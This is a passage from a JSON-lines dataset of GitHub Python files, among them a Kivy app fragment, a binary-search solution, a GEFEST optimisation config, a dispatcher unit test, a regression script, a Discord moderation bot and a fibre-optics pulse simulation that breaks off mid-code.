clear_fields(self):\r\n\r\n self.root.ids.addedName.text = \"\"\r\n self.root.ids.addedNumber.text = \"\"\r\n\r\n def press_cancel(self):\r\n\r\n self.root.ids.popup.dismiss()\r\n self.clear_fields()\r\n self.status_text = \"\"\r\n\r\n def exit(self):\r\n exit()\r\n\r\n\r\n\r\n\r\nItemHireApp().run()\r\n\r\n\r\n\r\n\r\n","repo_name":"JR90/Python","sub_path":"project 1.py","file_name":"project 1.py","file_ext":"py","file_size_in_byte":4338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33999373999","text":"MAX = 10**18\nABC_line = []\n\ndef is_ok(x, K):\n global ABC_line\n tmp = 0\n for ABC in ABC_line:\n a, b, c = ABC\n if x < b:\n continue\n tmp += max(min(((x - b) // c) + 1, a), 0)\n # print(f\"{K} < {tmp}\")\n return (K <= tmp)\n\n# 汎用的な二分探索のテンプレ\ndef binary_search(K):\n left = -1 #「index = 0」が条件を満たすこともあるので、初期値は -1\n right = MAX # 「index = a.size()-1」が条件を満たさないこともあるので、初期値は a.size()\n\n while (right - left > 1):\n mid = left + (right - left) // 2;\n print(f\"l: {left}, r: {right}, m: {mid}\", end=\" -> \")\n\n if (is_ok(mid, K)):\n right = mid\n else:\n left = mid\n\n # left は条件を満たさない最大の値、right は条件を満たす最小の値になっている\n return right\n\n\nif __name__ == '__main__':\n N, K = map(int, input().split())\n ans = []\n for _ in range(N):\n ABC_line.append(list(map(int, input().split())))\n\n print(binary_search(K))\n","repo_name":"come2ry/kyopro","sub_path":"PAST/G.py","file_name":"G.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12054999599","text":"from functools import partial\nfrom pathlib import Path\n\nimport numpy as np\n\nfrom cases.sound_waves.microphone_points import Microphone\nfrom gefest.core.configs.optimization_params import OptimizationParams\nfrom gefest.core.configs.tuner_params import TunerParams\nfrom gefest.core.geometry.datastructs.structure import Structure\nfrom gefest.core.geometry.domain import Domain\nfrom gefest.core.geometry.utils import get_random_structure\nfrom gefest.core.opt.objective.objective import Objective\nfrom gefest.tools.estimators.simulators.sound_wave.sound_interface import (\n SoundSimulator,\n generate_map,\n)\nfrom gefest.tools.tuners.utils import percent_edge_variance\nfrom gefest.tools.utils import poly_from_comsol_txt\n\n\nclass SoundFieldFitness(Objective):\n \"\"\"Evaluates sound pressure level difference with reference.\"\"\"\n\n def __init__(self, domain, estimator, path_best_struct=None, micro_slice=-1):\n super().__init__(domain, estimator)\n self.path_best_struct = path_best_struct\n self.micro_slice = micro_slice\n if path_best_struct is None:\n print('please, set up the best spl matrix into configuration')\n print('the best structure will be generated randomly')\n rnd_structure = get_random_structure(domain)\n best_spl = generate_map(domain, rnd_structure)\n else:\n best_structure = poly_from_comsol_txt(path_best_struct)\n best_spl = self.estimator(best_structure)\n best_spl = np.nan_to_num(best_spl, nan=0, neginf=0, posinf=0)\n micro = Microphone(matrix=best_spl).array()\n best_spl = np.concatenate(micro[micro_slice])\n\n self.best_spl = best_spl\n\n def _evaluate(self, ind: Structure):\n\n spl = self.estimator(ind)\n current_spl = np.nan_to_num(spl, nan=0, neginf=0, posinf=0)\n micro = Microphone(matrix=current_spl).array()\n current_spl = np.concatenate(micro[self.micro_slice])\n l_f = np.sum(np.abs(self.best_spl - current_spl))\n return l_f / len(current_spl)\n\n\n# # # domain pre-computation\n\npass\n\n# # #\n\ndomain_cfg = Domain(\n allowed_area=[\n [20, 20],\n [20, 100],\n [100, 100],\n [100, 20],\n [20, 20],\n ],\n name='main',\n min_poly_num=1,\n max_poly_num=4,\n min_points_num=3,\n max_points_num=16,\n polygon_side=0.001,\n min_dist_from_boundary=0.001,\n geometry_is_convex=True,\n geometry_is_closed=True,\n geometry='2D',\n)\n\n\ntuner_cfg = TunerParams(\n tuner_type='sequential',\n n_steps_tune=10,\n hyperopt_dist='normal',\n verbose=True,\n variacne_generator=partial(percent_edge_variance, percent=0.2),\n timeout_minutes=30,\n)\n\n\nopt_params = OptimizationParams(\n optimizer='gefest_ga',\n domain=domain_cfg,\n tuner_cfg=tuner_cfg,\n n_steps=100,\n pop_size=100,\n postprocess_attempts=3,\n mutation_prob=0.9,\n crossover_prob=0.6,\n mutations=[\n 'rotate_poly',\n 'resize_poly',\n 'add_point',\n 'drop_point',\n 'add_poly',\n 'drop_poly',\n 'pos_change_point',\n ],\n selector='tournament_selection',\n mutation_each_prob=[0.125, 0.125, 0.25, 0.25, 0.0, 0.0, 0.25],\n crossovers=[\n 'polygon_level',\n 'structure_level',\n ],\n crossover_each_prob=[1.0, 0.0],\n postprocess_rules=[\n 'not_out_of_bounds',\n 'valid_polygon_geom',\n 'not_self_intersects',\n 'not_too_close_polygons',\n # 'not_overlaps_prohibited',\n 'not_too_close_points',\n ],\n extra=5,\n estimation_n_jobs=-1,\n n_jobs=11,\n log_dir='logs/tuners_exp',\n run_name='roulette_1_obj',\n golem_keep_histoy=True,\n golem_genetic_scheme_type='steady_state',\n golem_surrogate_each_n_gen=5,\n objectives=[\n SoundFieldFitness(\n domain_cfg,\n SoundSimulator(domain_cfg, 200),\n str(Path(__file__).parent) + '\\\\figures\\\\bottom_square.txt',\n -1,\n ),\n ],\n)\n","repo_name":"aimclub/GEFEST","sub_path":"cases/sound_waves/configuration/config_parallel.py","file_name":"config_parallel.py","file_ext":"py","file_size_in_byte":3982,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"53"} +{"seq_id":"38337224964","text":"import threading\nimport unittest\nfrom pydetours.comm import DefaultChannel\nfrom pydetours.dispatcher import Dispatcher\nfrom pydetours.handler import SimpleControlHandler\n\n\nclass Handler(object):\n\n \"\"\" Sugar class to test Dispatching Mechanism. \"\"\"\n\n def __init__(self, id, handle):\n \"\"\" Constructor. \"\"\"\n super(Handler, self).__init__()\n self._id = id\n self._handle = handle\n self._header = None\n\n def handle_event(self):\n \"\"\" Mock handle event. \"\"\"\n evt = self._handle.recv()\n self._header = evt[0]\n if 'True' == self._header.get('payload', 'False'):\n self._payload = [x**self._id for x in evt[1]]\n resp_msg = {'sink': self._id}\n self._handle.send([resp_msg])\n\n def stop(self):\n \"\"\" Free all resources and close handle. \"\"\"\n self._handle.close()\n\n\nclass ReactorDispatcherTestCase(unittest.TestCase):\n\n \"\"\"docstring for ReactorDispatcherTestCase\"unittest.TestCase .\"\"\"\n\n @classmethod\n def setUpClass(cls):\n \"\"\" SetUp the whole class. \"\"\"\n cls._clients = {}\n cls._servers = {}\n cls._handlers = {}\n cls._RANGE = 4\n\n for x in range(1, cls._RANGE):\n endpoint = \"ipc:///tmp/%d.ipc\" % x\n cls._clients[x] = DefaultChannel(endpoint)\n cls._servers[x] = DefaultChannel(endpoint)\n cls._clients[x].connect()\n cls._servers[x].bind()\n\n handler_table = {}\n for x in range(1, cls._RANGE):\n server = cls._servers[x]\n handler = Handler(x, server)\n cls._handlers[x] = handler\n handler_table[server.socket] = handler\n\n control_channel = DefaultChannel('ipc:///tmp/control.ipc')\n control_channel.bind()\n control_handler = SimpleControlHandler(control_channel, name='Control')\n my_dispatcher = Dispatcher(handler_table)\n my_dispatcher.control_handler = control_handler\n threading.Thread(target=my_dispatcher.dispatch_events).start()\n\n @classmethod\n def tearDownClass(cls):\n \"\"\" Tear Down the whole class. \"\"\"\n for x in range(1, cls._RANGE):\n cls._clients[x].close()\n cls._servers[x].close()\n\n def dispatch_events_test(self):\n # \"\"\" Test dispatch events. \"\"\"\n handlers = ReactorDispatcherTestCase._handlers\n # msg = \"{\\\"source\\\": \\\"%d\\\", \\\"payload\\\": \\\"False\\\"}\"\n header1 = {'source': '1', 'payload': 'False'}\n\n header2 = {'source': '2', 'payload': 'True'}\n payload2 = bytes([1, 2])\n\n header3 = {'source': '3', 'payload': 'True'}\n payload3 = bytes([1, 2, 3])\n try:\n client1 = ReactorDispatcherTestCase._clients[1]\n client2 = ReactorDispatcherTestCase._clients[2]\n client3 = ReactorDispatcherTestCase._clients[3]\n except KeyError as k:\n self.fail(\"Could not get clients: {0}\".format(k))\n\n client1.send([header1])\n resp1 = client1.recv()\n self.assertEquals(1, resp1[0].get('sink'), 'Sink value wrong.')\n self.assertEquals(header1['source'], handlers[1]._header['source'])\n self.assertEquals(header1['payload'], handlers[1]._header['payload'])\n\n client2.send([header2, payload2])\n resp2 = client2.recv()\n\n self.assertEquals('2', handlers[2]._header['source'])\n self.assertEquals('True', handlers[2]._header['payload'])\n self.assertEquals(payload2[0], handlers[2]._payload[0])\n self.assertEquals(payload2[1]**2, handlers[2]._payload[1])\n self.assertEquals(2, resp2[0].get('sink'), 'Sink value wrong.')\n\n client3.send([header3, payload3])\n resp3 = client3.recv()\n\n # Checking handling of third client\n self.assertEquals('3', handlers[3]._header['source'])\n self.assertEquals('True', handlers[3]._header['payload'])\n self.assertEquals(payload3[0], handlers[3]._payload[0])\n self.assertEquals(payload3[1]**3, handlers[3]._payload[1])\n self.assertEquals(payload3[2]**3, handlers[3]._payload[2])\n # Receing response from handler3\n self.assertEquals(3, resp3[0].get('sink'), 'Sink value wrong.')\n\n control = DefaultChannel('ipc:///tmp/control.ipc')\n control.connect()\n control.send([{'action': 'terminate'}])\n control.close()\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"michelav/cloud-detours","sub_path":"pydetours/test/dispatcher_test.py","file_name":"dispatcher_test.py","file_ext":"py","file_size_in_byte":4402,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"29949885615","text":"def LinearRegression():\n import pandas as pd\n import matplotlib.pyplot as plt\n from sklearn.linear_model import LinearRegression\n name_of_csv=\"cluster_all.csv\"\n df = pd.read_csv(name_of_csv)\n df.to_numpy()\n X = df['Popular_date']\n y = df['Loudness']\n X_np=X.to_numpy()\n y_np=y.to_numpy()\n X_np=X_np.reshape(-1, 1)\n y_np=y_np.reshape(-1, 1)\n LinearRegression().fit(X_np, y_np).coef_\n LinearRegression().fit(X_np, y_np).intercept_\n plt.plot(X_np, y_np)\n plt.scatter(X_np, y_np)\n R_squared= LinearRegression().fit(X_np, y_np).score(X_np, y_np)\n print(R_squared)\n \n return plt.plot(X_np, LinearRegression().fit(X_np, y_np).coef_*X_np + LinearRegression().fit(X_np, y_np).intercept_)","repo_name":"Jingxue-24/QM2-team9","sub_path":"LinearRegression/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41503069781","text":"# main.py\nimport discord\nfrom discord.ext import commands\nimport json\n\nwith open('./config.json', 'r') as cjson:\n config = json.load(cjson)\n\nprefix = config[\"settings\"][\"prefix\"]\nclient = commands.Bot(command_prefix=prefix)\nclient.remove_command(\"help\")\n\n@client.event\nasync def on_ready():\n print(f\"{client.user} has connected to Discord\")\n\n@client.command()\nasync def ping(ctx):\n embed = discord.Embed()\n embed.add_field(name=\"Champ\", value=\"Poggers\")\n embed.set_footer(text=\"Memers\")\n await ctx.channel.send(embed=embed)\n@client.command()\n@commands.has_permissions(ban_members = True)\nasync def ban(ctx, member: discord.Member, *, reason=None):\n await member.ban(reason=reason)\n await ctx.channel.send(\"The member has been banned from the server\")\n@client.command()\n@commands.has_permissions(kick_members = True)\nasync def kick(ctx, member: discord.Member, *, reason=None):\n await member.kick(reason=reason)\n await ctx.channel.send(\"The member has been kicked from the server\")\n@client.command()\nasync def help(ctx):\n embed=discord.Embed()\n embed.add_field(name=\"Help\", value=\"Welcome to the help of the tutorial bot\")\n embed.add_field(name=\"kick <@user> \", value=\"Kicks the user from the server\")\n embed.add_field(name=\"ban <@user> \", value=\"Bans the user from the server\")\n await ctx.channel.send(embed=embed)\n\nclient.run(config[\"token\"])","repo_name":"Smirf123/discordpytutorial","sub_path":"Pt 3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16611544868","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 23 13:28:33 2020\n\n@author: Bruger\n\"\"\"\n\n\n\n\n#In this script, I try to model the effect of multiples frequencies of light inside the NL medium. \n#For random birefringence, I reuse modified code taken from Agrawall, specifically chapter 7.4. \n\n\n#Import Math libraries\nimport numpy as np\nimport pandas as pd\nimport scipy as sp\nimport scipy.fftpack\nimport scipy.optimize\nfrom scipy.fftpack import fft, ifft, fftshift,ifftshift\n\nfrom scipy.interpolate import interp1d\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\n#Define pi for convenience\nglobal pi; pi=np.pi \n\n\n# import py_pol as ppp\n# from py_pol import degrees, np\n# from py_pol.stokes import Stokes\n# from py_pol.mueller import Mueller\n# from py_pol.drawings import draw_poincare_sphere, draw_on_poincare\n\nimport random\n\n\n#Import the custom gif library to make animations of results\n#import gif\n###\n\n\n#Specify custom style for plots\nplt.rcParams.update({'font.size': 14})\nplt.rcParams.update({'lines.linewidth': 5})\n\ndef f2lBW(DeltaF,lamb_c):\n return DeltaF*lamb_c**2/c\n\ndef l2fBW(DeltaL,freq_c):\n return freq_c**2/c*DeltaL\n\n\n\ndef getPhase(a): #Returns the local phase\n \n \n phi= np.angle(a)\n phi=(phi + 2 * np.pi) % (2 * np.pi)\n phi=np.unwrap(phi)\n \n \n #phi=np.cumsum(phi)/2/pi\n phi=phi-phi[int(np.floor(len(phi)/2))]\n return (phi)\n\ndef getChirp(t,a): #Note: Time must be in s\n \n phase=getPhase(a)\n step=np.diff(t)\n dummy=np.diff(phase)\n dummy=-1.0*np.append(dummy[0]-(dummy[1]-dummy[0]),dummy)/(step[0])/2/pi #Return the local chirp in Hz\n \n return dummy\n\n#Define function to obtain the frequency spectrum of a pulse\n#Define function to obtain the frequency spectrum of a pulse\ndef getSpectrumFromPulse(t,a):\n \n Energy1=np.round(pulseEnergy(t,a),5) #Find energy of pulse\n n=len(t) #length of time vector\n dt=t[1]-t[0] #Length of time step\n f = fftshift(scipy.fftpack.fftfreq(n, d=dt)) #Generate frequencies\n A0ff0=fftshift((fft(a[0])))*(dt) #Take FFT of pulse to get frequencies\n A0ff1=fftshift((fft(a[1])))*(dt) #Take FFT of pulse to get frequencies\n \n output=np.array([A0ff0,A0ff1])\n Energy2=np.round(spectralEnergy(f,output),5) #Determine total energy of spectrum\n\n if Energy1 != Energy2: #Verify that energy has not been lost\n print(\"Warning energy was lost when converting from pulse to spectrum\")\n print('Spectral energy ='+str(Energy2))\n print('Pulse energy ='+str(Energy1))\n \n assert(Energy1==Energy2) \n assert(Energy1==Energy2)\n \n return f,output\n \n#Define a function to get the pulse corresponding to a certain spectrum\ndef getPulseFromSpectrum(f,af):\n \n Energy2=np.round(spectralEnergy(f,af),5) #Energy of spectrum\n \n n=len(f) #Length of list of requencies\n df=f[1]-f[0] #Frequency step\n t = ifftshift(scipy.fftpack.fftfreq(n, d=df)) #generate time trace\n A0=scipy.fftpack.ifft(ifftshift((af[0])))/(t[1]-t[0])# Take FFT of spectrum to get pulse (NEED TO BE iFFT?)\n A1=scipy.fftpack.ifft(ifftshift((af[1])))/(t[1]-t[0])# Take FFT of spectrum to get pulse (NEED TO BE iFFT?)\n \n #A = np.divide(A[-np.arange(A.shape[0])],s.shape[-1])\n output=np.array([A0,A1])\n Energy1=np.round(pulseEnergy(t,output),5) #Energy of pulse\n \n #Compare energies\n if Energy1 != Energy2:\n print(\" \")\n print(\"Warning energy was lost when converting from spectrum to pulse\")\n print('Spectral energy ='+str(Energy2))\n print('Pulse energy ='+str(Energy1))\n print(\" \")\n \n assert(Energy1==Energy2)\n assert(Energy1==Energy2)\n return t,output #Return times and pulse [::-1]\n \n#Define a box of height 1 centered at t0 and width w\ndef box(t,t0,w):\n out=np.ones_like(t)*1e-100\n \n i=0\n for ts in t:\n if np.abs(ts-t0)<=w/2:\n out[i]=1\n i=i+1 \n return out\n\ndef pulsePower(a):\n return np.abs(a[0])**2+np.abs(a[1])**2\n\ndef pulseEnergy(t,a): #Determines the energy of the input pulse in [J] if given a time vector in [s] and pulse in units of sqrt(W)\n return np.trapz(pulsePower(a),t)\n\ndef spectralPower(af):\n return np.abs(af[0])**2+np.abs(af[1])**2\n\ndef spectralEnergy(f,af): #Takes a list of frequencies [Hz] and a spectrum in sqrt(W/Hz) and returns total energy\n \n return np.trapz(spectralPower(af),f)\n \n\n\ndef GaussianPulse(t,A,T0,s,c,pol): #Function used to define a Gaussian pulse\n \n \n amplitude=A*np.exp(-(t-T0)**2/(2*s**2))+c\n return np.array([pol[0]*amplitude,pol[1]*amplitude])\n\ndef GaussianSpectrum(omega,Aw,w0,sw,cw): #Function used to define a Gaussian spectral line.\n return Aw*np.exp(-(omega-w0)**2/(2*sw**2))+cw\n\n\ndef getSideband(freq,spectrum,fs,fp,n):\n fd=np.abs(fp-fs)\n boxfilt=box(freq,fp+(n+1)*fd,fd/5)\n return np.array([spectrum[0]*boxfilt,spectrum[1]*boxfilt])\n\n\ndef getStokes(pulse):\n S0=pulsePower(pulse)\n S1=(np.abs(pol2[0])**2-np.abs(pol2[1])**2)*np.ones_like(pulse[0])/S0\n S2=2*np.real(pol2[0]*np.conj(pol2[1]))*np.ones_like(pulse[0])/S0\n S3=-2*np.imag(pol2[0]*np.conj(pol2[1]))*np.ones_like(pulse[0])/S0\n \n return np.array([S0/np.max(S0),S1,S2,S3])\n\n\n###### Define plot parameters #####\n \nglobal gifsize\ngifsize=75\n\n\n############### Define constants #######################\nc=3e8 #Speed of light\n\nrounding=3 #Number of decimals we want to round to\n\n\n############### Define simulation parameters ###############\nglobal nt\nnt=2024*100*4 #FFT points\n\nprint(\" \")\nprint(\"For the FFT, we will use a total of nt=\"+str(nt)+' points.')\nprint(\" \")\n\nglobal step_num\nstep_num=round(100) #No. of z-steps\n\ndispersion_on=0#5e8\nNL_on=1\nBiref_on=0\nrandom.seed(126)\n\n\nsidebandnumber=1\n\nprint(\" \")\nprint(\"The number of steps in solving the NLSE will be \"+str(step_num))\nprint(\" \")\n \n\n\n############### Fiber parameters #######################\nglobal distance\ndistance=2000 #Distance in meters\ngamma=1*0.001#Gamma in /W/m\nalpha=0 #Loss in db/LD\nPcr=1/(gamma*distance)\nprint(\"The critical power of the fiber P_cr=\"+str(Pcr)+'W')\n\nglobal deltaz\ndeltaz=distance/step_num\n\n\n\nprint(\" \")\nprint(\"The fiber is divided into N=\"+str(step_num)+' segments.')\nprint(\"The length of the fiber is \"+str(distance/1e3)+'km')\nprint(\"Each step has a length of \"+str(np.round(deltaz,rounding))+' m')\nprint(\" \")\n\n################ Spectral components ############################\n\n\n#Peak powers of pulses in units of [W]\npower1=1.84*Pcr #Pump corresponding to n=-1\npower2=0.10*Pcr #Signal corresponding to n=0\npower3=0.0\npower4=0.0\npower5=0.0\npower6=0.0\npower7=0.0\npower8=0.0\npower9=0.0\n\npowerlist=np.array([power1,power2,power3,power4,power5,power6,power7,power8,power9])\nprint(\" \")\nprint(\"The pulse powers are:\")\nprint(str(powerlist)+'[W]')\nprint(\" \")\nprint(\"The pulse power relative to P_cr ([dBc]) are:\")\nprint(str(10*np.log10(powerlist/Pcr)))\n\n\n#Polraization angle\ntheta1=45 #X/Y pol of pump\ntheta2= 0 #X/Y pol of signal\ntheta3=45 \ntheta4=45 \ntheta5=45 \ntheta6=45 \ntheta7=45 \ntheta8=45 \ntheta9=45 \n\n\n#Phase delay between x and y comp for (phi=90, theta=45 => circular polarization) \nphi1= 0 #90 \nphi2= 0 #90 \nphi3=90 #90 \nphi4=90 #90 \nphi5=90 #90 \nphi6=90 #90 \nphi7=90 #90 \nphi8=90 #90 \nphi9=90 #90 \n\n#Overall phase delay\ndelta1=0\ndelta2=0 \ndelta3=180 \ndelta4=180 \ndelta5=180 \ndelta6=180 \ndelta7=180 \ndelta8=180 \ndelta9=180 \n\ndegrees=pi/180\n\n#Jones vectors\npol1=np.array([np.cos(theta1*degrees),np.sin(theta1*degrees)*np.exp(1j*phi1*degrees)])*np.exp(1j*delta1*degrees)\npol2=np.array([np.cos(theta2*degrees),np.sin(theta2*degrees)*np.exp(1j*phi2*degrees)])*np.exp(1j*delta2*degrees)\npol3=np.array([np.cos(theta3*degrees),np.sin(theta3*degrees)*np.exp(1j*phi3*degrees)])*np.exp(1j*delta3*degrees)\npol4=np.array([np.cos(theta4*degrees),np.sin(theta4*degrees)*np.exp(1j*phi4*degrees)])*np.exp(1j*delta4*degrees)\npol5=np.array([np.cos(theta5*degrees),np.sin(theta5*degrees)*np.exp(1j*phi5*degrees)])*np.exp(1j*delta5*degrees)\npol6=np.array([np.cos(theta6*degrees),np.sin(theta6*degrees)*np.exp(1j*phi6*degrees)])*np.exp(1j*delta6*degrees)\npol7=np.array([np.cos(theta7*degrees),np.sin(theta7*degrees)*np.exp(1j*phi7*degrees)])*np.exp(1j*delta7*degrees)\npol8=np.array([np.cos(theta8*degrees),np.sin(theta8*degrees)*np.exp(1j*phi8*degrees)])*np.exp(1j*delta8*degrees)\npol9=np.array([np.cos(theta9*degrees),np.sin(theta9*degrees)*np.exp(1j*phi9*degrees)])*np.exp(1j*delta9*degrees)\n\n\n\n#Field amplitudes of pulses in units of [sqrt(W)]\nampllist=np.sqrt(powerlist)\nprint(\" \")\nprint(\"The field amplitudes are:\")\nprint(str(np.round(ampllist,rounding))+'[sqrt(W)]')\n\n\n\n#Wavelengths of spectral components:\n\nlambda1=(1550+0.07)*1e-9# Wavelength in m #Pump\nlambda2=(1550-0.07)*1e-9# Wavelength in m #Signal\n\nlambda3=1300.0e-9#1272.6e-9 #Wavelength in m\nlambda4=1300.0e-9#1272.6e-9 #Wavelength in m\nlambda5=1300.0e-9#1272.6e-9 #Wavelength in m\nlambda6=1300.0e-9#1272.6e-9 #Wavelength in m\nlambda7=1300.0e-9#1272.6e-9 #Wavelength in m\nlambda8=1300.0e-9#1272.6e-9 #Wavelength in m\nlambda9=1300.5e-9#1273.3e-9 #Wavelength in m\n\nlambdalist=np.array([lambda1,lambda2,lambda3,lambda4,lambda5,lambda6,lambda7,lambda8,lambda9])\nprint(\" \")\nprint('The wavelengths are')\nprint(str(np.round(lambdalist*1e9,rounding))+'[nm]')\n\n\n\n#Define angular frequencies\nomegalist=c*2*pi/lambdalist\nprint(\" \")\nprint('The angular frequencies are')\nprint(str(np.round(omegalist/1e12,rounding))+'[2pi*THz]')\n\n\nwm=np.abs(omegalist[0]+omegalist[1])/2\nws=np.abs(omegalist[0]-omegalist[1])\n\nfm=wm/2/pi\nfs=ws/2/pi\n\n\n\n#Define actual frequencies\nfreqlist=omegalist/2/pi\nprint(\" \")\nprint('The frequencies are')\nprint(str(np.round((freqlist+fm)/1e12,rounding))+'[THz]')\n\n\nOmegaDiffMax=np.max(omegalist)-np.min(omegalist)\n\n\n#Define spectral widths in units of [Hz] of field components \n\nsw1=0.01e9\nsw2=0.01e9 \nsw3=0.01e9 \nsw4=0.01e9 \nsw5=0.01e9 \nsw6=0.01e9 \nsw7=0.01e9 \nsw8=0.01e9 \nsw9=0.01e9 \n\nswlist=np.array([sw1,sw2,sw3,sw4,sw5,sw6,sw7,sw8,sw9])\nprint(\" \")\nprint('The spectral widths are')\nprint(str(np.round(swlist/1e6,rounding))+'[MHz]')\n\nlwlist=f2lBW(swlist,lambdalist)\nprint(\" \")\nprint('The wavelength widths are')\nprint(str(np.round(lwlist*1e12,rounding))+'[pm]')\n\n\n\n#Gaussian pulse widths in [s]\nTlist=1/2/pi/swlist\nprint(\" \")\nprint('The pulse widths are')\nprint(str(np.round(Tlist*1e9,rounding))+'[ns]')\n\nAwlist=ampllist*np.sqrt(2*pi)*Tlist\n\nprint(\" \")\nprint(\"The spectral amplitudes are:\")\nprint(str(np.round(Awlist*1e6*1e3,rounding))+'[sqrt(uW/THz)]')\nprint(\" \")\n\nprint(\" \")\nprint(\"The spectral peaks are:\")\nprint(str(np.round(Awlist**2*1e12*1e6,rounding))+'[uW/THz]')\nprint(\" \")\n\n\n\n\nt1=0\nt2=0\nt3=0\nt4=0\nt5=0\nt6=0\nt7=0\nt8=0\nt9=0\n\ntlist=np.array([t1,t2,t3,t4,t5,t6,t7,t8,t9])\n\nprint(\" \")\nprint(\"The starting times for the pulses are\")\nprint(str(np.round(tlist*1e9,rounding))+'[ns]')\n\n\n\n\n\n\n#### Determining the dispersion ###\n\n#We do this by opening a separate data file I generated to get the beta_2 parameter for a regular SMF.\ncolnames=['lspace', 'b2'] \n\ndf=pd.read_csv('lspaceVSbeta2.csv', names=colnames, header=1) \nlspace=df[\"lspace\"]\nb2=df[\"b2\"]\n\nlspace=lspace/1e6 #Convert into m\nb2=b2*1e-24 #Convert in to s^2/m\n\nwspace=c*2*pi/lspace\n \n\nf3l = interp1d(lspace, b2, kind='cubic') #Functions for obtaining beta2 when given wavelength of angular freq.\nf3w = interp1d(wspace, b2, kind='cubic')\n\nlambdaspace=np.linspace(1200e-9,1300e-9,10000)\npp=f3l(lambdaspace)\ni0=np.argmin(np.abs(pp))\nl0=lambdaspace[i0]\n\nplt.figure()\nplt.title('Dispersion vs. Wavelength')\nplt.plot(lspace*1e9,b2*1e24)\n#plt.plot(lambdalist[0]*1e9,f3l(lambdalist[0])*1e24,'r.')\nplt.plot(lambdalist*1e9,f3l(np.array(lambdalist))*1e24,'r.',markersize=12)\nplt.xlabel('Wavelength [nm]')\nplt.ylabel('beta2 [ps^2/m]')\nplt.grid()\nplt.axis([1200,1500,-50,5])\n#plt.axis([np.min(lambdalist)*1e9-0.5,np.max(lambdalist)*1e9+0.5,np.min(f3l(lambdalist)*1e24)-0.5,np.max(f3l(lambdalist)*1e24)+0.5])\nplt.show()\n\n#w1=c*2*pi/wl2\n#w2=c*2*pi/wl1\n\nplt.figure()\nplt.title('Dispersion vs. Frequency')\nplt.plot(wspace/2/pi/1e12,b2*1e24)\nplt.plot(wspace/2/pi/1e12,f3w(wspace)*1e24)\nplt.plot((omegalist+wm)/2/pi/1e12,f3w(omegalist+wm)*1e24,'r.',markersize=12)\nplt.xlabel('Frequency [THz]')\nplt.ylabel('beta2 [ps^2/m]')\nplt.grid()\nplt.axis([np.min((omegalist+wm)/2/pi)/1e12*0.9999,np.max((omegalist+wm)/2/pi)/1e12*1.0001,np.min(f3w(omegalist+wm))*1e24*0.9999,np.max(f3w(omegalist+wm))*1e24*0.9998])\nplt.show()\n\n\n\nLd=Tlist**2/np.abs(f3w(omegalist+wm)*dispersion_on)\n\nprint(\" \")\nprint(\"The dispersion lengths for the pulses are\")\nprint(str(np.round(Ld/1e3,rounding))+'[km]')\nprint(\" \")\n\nLNL=1/(gamma*powerlist*NL_on)\nprint(\" \")\nprint(\"The NL lengths for the pulses are\")\nprint(str(np.round(LNL/1e3,rounding))+'[km]')\nprint(\" \")\n\n\n\n\n#Define the angular frequencies used for the FFT\nmx=np.max((omegalist))\nmi=np.min((omegalist))\nomega=np.linspace(-20*ws,20*ws,nt) #Defines a list of frequencies centered between the two main frequencies\nglobal freq\nfreq=omega/2/pi\nllambda=c*2*pi/omega\n\nfplot=(freq)/1e12\n\ndw=omega[1]-omega[0]\ndf=dw/2/pi\n\n\nprint(\" \")\nprint(\"The list of frequencies extends from \"+str(np.min(freq)/1e12)+'[THz] to '+str(np.max(freq)/1e12)+'[THz].')\nprint(\"That is a range of \"+str((np.max(freq)-np.min(freq))/1e9)+'[GHz]')\nprint(\"The frequency resolution is \"+str(df/1e6)+'[MHz]')\nprint(\" \")\nprint(\"In terms of wavelengths:\")\nprint(\"The list of wavelengths extends from \"+str(np.min(llambda)*1e9)+'[nm] to '+str(np.max(llambda)*1e9)+'[nm].')\nprint(\"That is a range of \"+str((np.max(llambda)-np.min(llambda))*1e9)+'[nm]')\nprint(\"The wavelength resolution is \"+str((llambda[0]-llambda[1])*1e15)+'[fm]')\nprint(\" \")\n\nTmax=1/df\nglobal dt\ndt=Tmax/nt\nglobal tau\ntau=np.arange(-nt/2,nt/2)*dt\n\nprint(\" \")\nprint(\"The time range extends from \"+str(np.min(tau)*1e9)+'[ns] to '+str(np.max(tau)*1e9)+'[ns].')\nprint(\"That is a range of \"+str((np.max(tau)*1e9-np.min(tau)*1e9))+'[ns]')\nprint(\"And just to confirm, Tmax=1/df=\"+str(Tmax*1e9)+'[ns]')\nprint(\"The time resolution is dt=\"+str(dt*1e12)+'[ps]')\n\nprint(\" \")\nprint(\"The time range is \"+str(Tmax*1e9)+'ns')\nprint(\"The time resolution is \"+str(dt*1e9)+'ns')\nprint(\" \")\n\nprint(\"Generating spectra for each pulse\")\n\n### Generate the spectra for the various frequency components ###\n#Spec1=GaussianSpectrum(freq,Awlist[0],freqlist[0],swlist[0],0)\n#Spec2=GaussianSpectrum(freq,Awlist[1],freqlist[1],swlist[1],0)\n#Spec3=GaussianSpectrum(freq,Awlist[2],freqlist[2],swlist[2],0)\n#Spec4=GaussianSpectrum(freq,Awlist[3],freqlist[3],swlist[3],0)\n#Spec5=GaussianSpectrum(freq,Awlist[4],freqlist[4],swlist[4],0)\n#Spec6=GaussianSpectrum(freq,Awlist[5],freqlist[5],swlist[5],0)\n#Spec7=GaussianSpectrum(freq,Awlist[6],freqlist[6],swlist[6],0)\n#Spec8=GaussianSpectrum(freq,Awlist[7],freqlist[7],swlist[7],0)\n#Spec9=GaussianSpectrum(freq,Awlist[8],freqlist[8],swlist[8],0)\n#\n#print(\" \")\n#print(\"Adding up the spectra into a total spectrum\")\n#Add them all up to a total 